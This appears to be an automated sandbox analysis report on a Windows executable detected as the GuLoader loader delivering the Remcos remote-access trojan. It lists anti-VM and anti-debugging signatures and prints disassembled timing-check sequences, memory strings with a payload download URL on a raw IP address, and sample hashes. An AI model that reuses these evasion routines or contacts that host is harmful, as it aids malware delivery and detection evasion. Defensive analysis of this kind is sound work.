Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe	Code function: 1_2_020F00AA push esp; iretd	1_2_020F00AB
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe	Code function: 13_2_0056A006 pushfd ; iretd	13_2_0056A007
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe	Code function: 13_2_00569F30 pushfd ; retf	13_2_00569F43

Source: initial sample

Static PE information: section name: .text entropy: 7.08169017725

Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion:

Contains functionality to detect hardware virtualization (CPUID execution measurement)

Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe	Code function: 1_2_020F03CA NtWriteVirtualMemory,		1_2_020F03CA
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe	Code function: 1_2_020F0BEF NtWriteVirtualMemory,TerminateProcess,LoadLibraryA,		1_2_020F0BEF

Detected RDTSC dummy instruction sequence (likely for instruction hammering)

Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe	RDTSC instruction interceptor: First address: 00000000020F7542 second address: 00000000020F7542 instructions:
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe	RDTSC instruction interceptor: First address: 00000000020F0504 second address: 00000000020F0504 instructions:

Tries to detect Any.run

Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe	File opened: C:\Program Files\Qemu-ga\qemu-ga.exe	Jump to behavior
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe	File opened: C:\Program Files\qga\qga.exe	Jump to behavior
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe	File opened: C:\Program Files\Qemu-ga\qemu-ga.exe	Jump to behavior
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe	File opened: C:\Program Files\qga\qga.exe	Jump to behavior

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: LzbZ4T1iV8.exe, 00000001.00000002.862725777.0000000002100000.00000004.00000001.sdmp	Binary or memory string: NTDLLKERNEL32USER32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEPSAPI.DLLMSI.DLLPUBLISHERSHELL32ADVAPI32TEMP=WINDIR=\SYSWOW64\MSVBVM60.DLL
Source: LzbZ4T1iV8.exe, 00000001.00000002.862725777.0000000002100000.00000004.00000001.sdmp, LzbZ4T1iV8.exe, 0000000D.00000002.1716793566.0000000000670000.00000004.00000001.sdmp	Binary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE
Source: LzbZ4T1iV8.exe, 0000000D.00000002.1716793566.0000000000670000.00000004.00000001.sdmp	Binary or memory string: NTDLLKERNEL32USER32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEPSAPI.DLLMSI.DLLPUBLISHERSHELL32ADVAPI32TEMP=HTTP://101.99.94.119/WEALTH_PRUUQVZW139.BINWININET.DLLMOZILLA/5.0 (WINDOWS NT 6.1; WOW64; TRIDENT/7.0; RV:11.0) LIKE GECKO

Tries to detect virtualization through RDTSC time measurements

Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe	RDTSC instruction interceptor: First address: 00000000020F74C3 second address: 00000000020F7542 instructions: 0x00000000 rdtsc 0x00000002 lfence 0x00000005 shl edx, 20h 0x00000008 or edx, eax 0x0000000a popad 0x0000000b push D90E6CFBh 0x00000010 call 00007F7AFC9FAF32h 0x00000015 mov dword ptr [ebp+04h], eax 0x00000018 mov ebx, dword ptr [eax+3Ch] 0x0000001b add eax, ebx 0x0000001d mov ebx, dword ptr [eax+78h] 0x00000020 mov eax, dword ptr [ebp+04h] 0x00000023 add eax, ebx 0x00000025 mov ecx, dword ptr [eax+18h] 0x00000028 mov dword ptr [ebp+08h], ecx 0x0000002b mov ecx, dword ptr [eax+1Ch] 0x0000002e mov dword ptr [ebp+14h], ecx 0x00000031 mov ecx, dword ptr [eax+24h] 0x00000034 mov dword ptr [ebp+10h], ecx 0x00000037 mov esi, dword ptr [eax+20h] 0x0000003a add esi, dword ptr [ebp+04h] 0x0000003d xor ecx, ecx 0x0000003f mov edx, dword ptr [esi] 0x00000041 add edx, dword ptr [ebp+04h] 0x00000044 mov dword ptr [ebp+000001F3h], eax 0x0000004a test si, 2E1Ah 0x0000004f mov eax, ecx 0x00000051 push eax 0x00000052 mov eax, dword ptr [ebp+000001F3h] 0x00000058 mov dword ptr [ebp+000001C8h], ebx 0x0000005e mov ebx, esi 0x00000060 push ebx 0x00000061 pushad 0x00000062 rdtsc
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe	RDTSC instruction interceptor: First address: 00000000020F7542 second address: 00000000020F7542 instructions:
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe	RDTSC instruction interceptor: First address: 00000000020F734C second address: 00000000020F734C instructions: 0x00000000 rdtsc 0x00000002 popad 0x00000003 inc ebx 0x00000004 inc edx 0x00000005 dec ecx 0x00000006 test ecx, ecx 0x00000008 jne 00007F7AFC9FAEFEh 0x0000000a mov al, byte ptr [edx] 0x0000000c mov byte ptr [ebx], al 0x0000000e pushad 0x0000000f mov ecx, 00000009h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe	RDTSC instruction interceptor: First address: 00000000020F8236 second address: 00000000020F8261 instructions: 0x00000000 rdtsc 0x00000002 lfence 0x00000005 shl edx, 20h 0x00000008 or edx, eax 0x0000000a popad 0x0000000b sub esi, 6F48A402h 0x00000011 cmp dword ptr [edi+14h], esi 0x00000014 mov esi, dword ptr [ebp+000001F0h] 0x0000001a je 00007F7AFC461375h 0x0000001c mov dword ptr [ebp+00000246h], eax 0x00000022 mov eax, 3E9A0B50h 0x00000027 pushad 0x00000028 lfence 0x0000002b rdtsc
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe	RDTSC instruction interceptor: First address: 00000000020F7D0C second address: 00000000020F7D0C instructions: 0x00000000 rdtsc 0x00000002 mov eax, 00B1C905h 0x00000007 xor eax, AE894D5Ah 0x0000000c xor eax, 9A90F0F9h 0x00000011 add eax, CB578B5Bh 0x00000016 cpuid 0x00000018 test ch, dh 0x0000001a popad 0x0000001b call 00007F7AFC9FAF1Bh 0x00000020 lfence 0x00000023 mov edx, 770EC33Bh 0x00000028 sub edx, 4238A07Dh 0x0000002e xor edx, 9CFEAEA4h 0x00000034 xor edx, D7D68C0Eh 0x0000003a mov edx, dword ptr [edx] 0x0000003c lfence 0x0000003f jmp 00007F7AFC9FAFF9h 0x00000044 test ch, ah 0x00000046 ret 0x00000047 sub edx, esi 0x00000049 ret 0x0000004a add edi, edx 0x0000004c dec dword ptr [ebp+000000F8h] 0x00000052 cmp dword ptr [ebp+000000F8h], 00000000h 0x00000059 jne 00007F7AFC9FAEFAh 0x0000005b cmp edx, eax 0x0000005d call 00007F7AFC9FAF5Ch 0x00000062 call 00007F7AFC9FAF3Eh 0x00000067 lfence 0x0000006a mov edx, 770EC33Bh 0x0000006f sub edx, 4238A07Dh 0x00000075 xor edx, 9CFEAEA4h 0x0000007b xor edx, D7D68C0Eh 0x00000081 mov edx, dword ptr [edx] 0x00000083 lfence 0x00000086 jmp 00007F7AFC9FAFF9h 0x0000008b test ch, ah 0x0000008d ret 0x0000008e mov esi, edx 0x00000090 pushad 0x00000091 rdtsc
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe	RDTSC instruction interceptor: First address: 00000000020F7E99 second address: 00000000020F7E99 instructions: 0x00000000 rdtsc 0x00000002 lfence 0x00000005 shl edx, 20h 0x00000008 or edx, eax 0x0000000a ret 0x0000000b mov esi, edx 0x0000000d pushad 0x0000000e mov eax, FE410F8Bh 0x00000013 xor eax, 50497853h 0x00000018 xor eax, DF92CCE2h 0x0000001d add eax, 8E6544C7h 0x00000022 cpuid 0x00000024 bt ecx, 1Fh 0x00000028 jc 00007F7AFC461A6Eh 0x0000002e cmp edx, eax 0x00000030 popad 0x00000031 test esi, 5A8E86D2h 0x00000037 call 00007F7AFC461551h 0x0000003c lfence 0x0000003f rdtsc
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe	RDTSC instruction interceptor: First address: 00000000020F0504 second address: 00000000020F0504 instructions:
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe	RDTSC instruction interceptor: First address: 000000000056734C second address: 000000000056734C instructions: 0x00000000 rdtsc 0x00000002 popad 0x00000003 inc ebx 0x00000004 inc edx 0x00000005 dec ecx 0x00000006 test ecx, ecx 0x00000008 jne 00007F7AFC46130Eh 0x0000000a mov al, byte ptr [edx] 0x0000000c mov byte ptr [ebx], al 0x0000000e pushad 0x0000000f mov ecx, 00000009h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe	RDTSC instruction interceptor: First address: 0000000000568236 second address: 0000000000568261 instructions: 0x00000000 rdtsc 0x00000002 lfence 0x00000005 shl edx, 20h 0x00000008 or edx, eax 0x0000000a popad 0x0000000b sub esi, 6F48A402h 0x00000011 cmp dword ptr [edi+14h], esi 0x00000014 mov esi, dword ptr [ebp+000001F0h] 0x0000001a je 00007F7AFC9FAF65h 0x0000001c mov dword ptr [ebp+00000246h], eax 0x00000022 mov eax, 3E9A0B50h 0x00000027 pushad 0x00000028 lfence 0x0000002b rdtsc
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe	RDTSC instruction interceptor: First address: 0000000000567D0C second address: 0000000000567D0C instructions: 0x00000000 rdtsc 0x00000002 mov eax, 00B1C905h 0x00000007 xor eax, AE894D5Ah 0x0000000c xor eax, 9A90F0F9h 0x00000011 add eax, CB578B5Bh 0x00000016 cpuid 0x00000018 test ch, dh 0x0000001a popad 0x0000001b call 00007F7AFC46132Bh 0x00000020 lfence 0x00000023 mov edx, 770EC33Bh 0x00000028 sub edx, 4238A07Dh 0x0000002e xor edx, 9CFEAEA4h 0x00000034 xor edx, D7D68C0Eh 0x0000003a mov edx, dword ptr [edx] 0x0000003c lfence 0x0000003f jmp 00007F7AFC461409h 0x00000044 test ch, ah 0x00000046 ret 0x00000047 sub edx, esi 0x00000049 ret 0x0000004a add edi, edx 0x0000004c dec dword ptr [ebp+000000F8h] 0x00000052 cmp dword ptr [ebp+000000F8h], 00000000h 0x00000059 jne 00007F7AFC46130Ah 0x0000005b cmp edx, eax 0x0000005d call 00007F7AFC46136Ch 0x00000062 call 00007F7AFC46134Eh 0x00000067 lfence 0x0000006a mov edx, 770EC33Bh 0x0000006f sub edx, 4238A07Dh 0x00000075 xor edx, 9CFEAEA4h 0x0000007b xor edx, D7D68C0Eh 0x00000081 mov edx, dword ptr [edx] 0x00000083 lfence 0x00000086 jmp 00007F7AFC461409h 0x0000008b test ch, ah 0x0000008d ret 0x0000008e mov esi, edx 0x00000090 pushad 0x00000091 rdtsc
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe	RDTSC instruction interceptor: First address: 0000000000567E99 second address: 0000000000567E99 instructions: 0x00000000 rdtsc 0x00000002 lfence 0x00000005 shl edx, 20h 0x00000008 or edx, eax 0x0000000a ret 0x0000000b mov esi, edx 0x0000000d pushad 0x0000000e mov eax, FE410F8Bh 0x00000013 xor eax, 50497853h 0x00000018 xor eax, DF92CCE2h 0x0000001d add eax, 8E6544C7h 0x00000022 cpuid 0x00000024 bt ecx, 1Fh 0x00000028 jc 00007F7AFC9FB65Eh 0x0000002e cmp edx, eax 0x00000030 popad 0x00000031 test esi, 5A8E86D2h 0x00000037 call 00007F7AFC9FB141h 0x0000003c lfence 0x0000003f rdtsc
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe	RDTSC instruction interceptor: First address: 0000000000562D9E second address: 000000000056734C instructions: 0x00000000 rdtsc 0x00000002 popad 0x00000003 push ebx 0x00000004 cmp bx, cx 0x00000007 mov ebx, dword ptr [ebp+000001E5h] 0x0000000d mov dword ptr [ebp+0000023Eh], edi 0x00000013 mov edi, ebx 0x00000015 push edi 0x00000016 mov edi, dword ptr [ebp+0000023Eh] 0x0000001c test cx, ax 0x0000001f mov dword ptr [ebp+00000277h], ecx 0x00000025 mov ecx, edi 0x00000027 push ecx 0x00000028 cmp bx, cx 0x0000002b mov ecx, dword ptr [ebp+00000277h] 0x00000031 call 00007F7AFC465881h 0x00000036 mov ecx, dword ptr [esp+0Ch] 0x0000003a mov edx, dword ptr [esp+08h] 0x0000003e mov ebx, dword ptr [esp+04h] 0x00000042 test ecx, ecx 0x00000044 je 00007F7AFC461338h 0x00000046 test eax, ecx 0x00000048 mov al, byte ptr [edx] 0x0000004a mov byte ptr [ebx], al 0x0000004c pushad 0x0000004d mov ecx, 00000009h 0x00000052 rdtsc

Contains functionality for execution timing, often used to detect debuggers

Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe

Code function: 1_2_020F8680 rdtsc

1_2_020F8680

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe	Window / User API: threadDelayed 9146			Jump to behavior
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe	Window / User API: foregroundWindowGot 461			Jump to behavior

May sleep (evasive loops) to hinder dynamic analysis

Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe TID: 6408	Thread sleep count: 9146 > 30			Jump to behavior
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe TID: 6408	Thread sleep time: -45730s >= -30000s			Jump to behavior

Sleep loop found (likely to delay execution)

Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe

Thread sleep count: Count: 9146 delay: -5

Jump to behavior

Source: LzbZ4T1iV8.exe, 0000000D.00000002.1716793566.0000000000670000.00000004.00000001.sdmp	Binary or memory string: ntdllkernel32user32C:\Program Files\Qemu-ga\qemu-ga.exeC:\Program Files\qga\qga.exepsapi.dllMsi.dllPublishershell32advapi32TEMP=http://101.99.94.119/WEALTH_PRUuqVZw139.binwininet.dllMozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Source: LzbZ4T1iV8.exe, 00000001.00000002.862725777.0000000002100000.00000004.00000001.sdmp	Binary or memory string: ntdllkernel32user32C:\Program Files\Qemu-ga\qemu-ga.exeC:\Program Files\qga\qga.exepsapi.dllMsi.dllPublishershell32advapi32TEMP=windir=\syswow64\msvbvm60.dll
Source: LzbZ4T1iV8.exe, 00000001.00000002.862725777.0000000002100000.00000004.00000001.sdmp, LzbZ4T1iV8.exe, 0000000D.00000002.1716793566.0000000000670000.00000004.00000001.sdmp	Binary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exe

Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe

System information queried: ModuleInformation

Jump to behavior

Anti Debugging:

Hides threads from debuggers

Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe	Thread information set: HideFromDebugger	Jump to behavior

Checks if the current process is being debugged

Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe	Process queried: DebugPort			Jump to behavior

Contains functionality for execution timing, often used to detect debuggers

Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe

Code function: 1_2_020F8680 rdtsc

1_2_020F8680

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe

Code function: 1_2_020F6562 LdrInitializeThunk,

1_2_020F6562

Contains functionality to read the PEB

Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe	Code function: 1_2_020F8680 mov eax, dword ptr fs:[00000030h]	1_2_020F8680
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe	Code function: 1_2_020F5461 mov eax, dword ptr fs:[00000030h]	1_2_020F5461
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe	Code function: 1_2_020F78E2 mov eax, dword ptr fs:[00000030h]	1_2_020F78E2
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe	Code function: 1_2_020F2CF2 mov eax, dword ptr fs:[00000030h]	1_2_020F2CF2
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe	Code function: 1_2_020F735B mov eax, dword ptr fs:[00000030h]	1_2_020F735B
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe	Code function: 1_2_020F37D8 mov eax, dword ptr fs:[00000030h]	1_2_020F37D8

HIPS / PFW / Operating System Protection Evasion:

Creates a process in suspended mode (likely to inject code)

Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe

Process created: C:\Users\user\Desktop\LzbZ4T1iV8.exe 'C:\Users\user\Desktop\LzbZ4T1iV8.exe'

Jump to behavior

Source: LzbZ4T1iV8.exe, 0000000D.00000002.1717238543.0000000000E80000.00000002.00000001.sdmp	Binary or memory string: Program Manager
Source: LzbZ4T1iV8.exe, 0000000D.00000002.1717238543.0000000000E80000.00000002.00000001.sdmp	Binary or memory string: Shell_TrayWnd
Source: LzbZ4T1iV8.exe, 0000000D.00000002.1717238543.0000000000E80000.00000002.00000001.sdmp	Binary or memory string: Progman
Source: logs.dat.13.dr	Binary or memory string: [ Program Manager ]
Source: LzbZ4T1iV8.exe, 0000000D.00000002.1717238543.0000000000E80000.00000002.00000001.sdmp	Binary or memory string: Progmanlock

Language, Device and Operating System Detection:

Contains functionality to query CPU information (cpuid)

Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe

Code function: 1_2_00401A45 cpuid

1_2_00401A45

Stealing of Sensitive Information:

GuLoader behavior detected

Source: Initial file

Signature Results: GuLoader behavior

Yara detected Remcos RAT

Source: Yara match

File source: 0000000D.00000002.1716863368.00000000006E7000.00000004.00000020.sdmp, type: MEMORY

Remote Access Functionality:

Yara detected Remcos RAT

Source: Yara match

File source: 0000000D.00000002.1716863368.00000000006E7000.00000004.00000020.sdmp, type: MEMORY

ID:	458125
Product:	CloudBasic
Start time:	21:16:24
Start date:	02.08.2021
Sample:	LzbZ4T1iV8.exe
Cookbook:	default.jbs
System description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Architecture:	WINDOWS
MD5:	41e1bc9de5f3b61639fb88143e933ff8
SHA1:	432531c5a0f7f82b8ec10e7f3fde1b51ebd3d0e8
SHA256:	d32cf33f8f64824f799ca44e9988ddc517e88db1235f93792d3ed2ddaa48e35f
Filetype:	Win32 Executable (generic) a (10002005/4) 99.15%

Windows Analysis Report LzbZ4T1iV8.exe

Overview

General Information

Detection

Signatures

Classification

Signatures

AV Detection:

Compliance:

Networking:

Key, Mouse, Clipboard, Microphone and Screen Capturing:

E-Banking Fraud:

System Summary:

Data Obfuscation:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Stealing of Sensitive Information:

Remote Access Functionality:

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Contacted Domains

Contacted URLs